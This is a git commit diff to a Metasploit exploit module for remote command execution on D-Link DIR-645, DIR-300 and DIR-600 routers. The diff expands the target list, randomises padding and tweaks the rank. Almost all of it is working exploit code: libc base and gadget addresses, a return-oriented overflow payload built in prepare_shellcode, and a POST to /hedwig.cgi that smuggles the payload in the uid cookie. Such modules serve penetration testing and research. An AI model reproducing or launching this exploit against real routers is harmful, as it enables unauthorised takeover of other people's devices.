Michael Messner 2014-06-14 17:02:55 +02:00
parent a3ae177347
commit 8eb21ded97
1 changed files with 7 additions and 11 deletions


@ -6,7 +6,7 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking # the exploit as it is is excellent but we can only start the telnetd and connect to it
Rank = ExcellentRanking
HttpFingerprint = { :pattern => [ /Linux,\ HTTP\/1.0,\ DIR-/ ] }
@ -39,10 +39,10 @@ class Metasploit3 < Msf::Exploit::Remote
],
'Targets' =>
[
[ 'D-Link DIR-645 v1.03',
[ 'Multiple Targets: D-Link DIR-645 v1.03, DIR-300 v2.14, DIR-600',
{
'Offset' => 973,
'LibcBase' => 0x2aaf8000, #Router
'LibcBase' => 0x2aaf8000, # Router
#'LibcBase' => 0x40854000, # QEMU environment
'System' => 0x000531FF, # address of system
'CalcSystem' => 0x000158C8, # calculate the correct address of system
@ -84,13 +84,10 @@ class Metasploit3 < Msf::Exploit::Remote
)
end
def prepare_shellcode(cmd)
# prepare our shellcode that triggers the crash:
shellcode = "\x41" * target['Offset'] # padding
shellcode = rand_text_alpha_upper(target['Offset']) # padding
shellcode << [target['LibcBase'] + target['System']].pack("V") # s0 - address of system
shellcode << "\x42" * 16 # unused reg $s1 - $s4
shellcode << rand_text_alpha_upper(16) # unused reg $s1 - $s4
shellcode << [target['LibcBase'] + target['CallSystem']].pack("V") # s5 - second gadget (call system)
# .text:000159CC 10 00 B5 27 addiu $s5, $sp, 0x170+var_160 # get the address of our command into $s5
@ -100,14 +97,14 @@ class Metasploit3 < Msf::Exploit::Remote
# .text:000159DC 09 F8 20 03 jalr $t9 # call system
# .text:000159E0 21 20 A0 02 move $a0, $s5 # our cmd -> into a0 as parameter for system
shellcode << "\x43" * 12 # unused registers $s6 - $fp
shellcode << rand_text_alpha_upper(12) # unused registers $s6 - $fp
shellcode << [target['LibcBase'] + target['CalcSystem']].pack("V") # $ra - gadget nr 1 (prepare the parameter for system)
# .text:000158C8 21 C8 A0 02 move $t9, $s5 # s5 - our second gadget
# .text:000158CC 09 F8 20 03 jalr $t9 # jump the second gadget
# .text:000158D0 01 00 10 26 addiu $s0, 1 # s0 our system address - lets calculate the right address
shellcode << "\x99" * 16 # filler in front of our command
shellcode << rand_text_alpha_upper(16) # filler in front of our command
shellcode << cmd
end
@ -117,7 +114,6 @@ class Metasploit3 < Msf::Exploit::Remote
begin
res = send_request_cgi({
'method' => 'POST',
#'uri' => "/hedwig_gdb.cgi", #for debugging on the router
'uri' => "/hedwig.cgi",
'cookie' => "uid=#{shellcode}",
'encode_params' => false,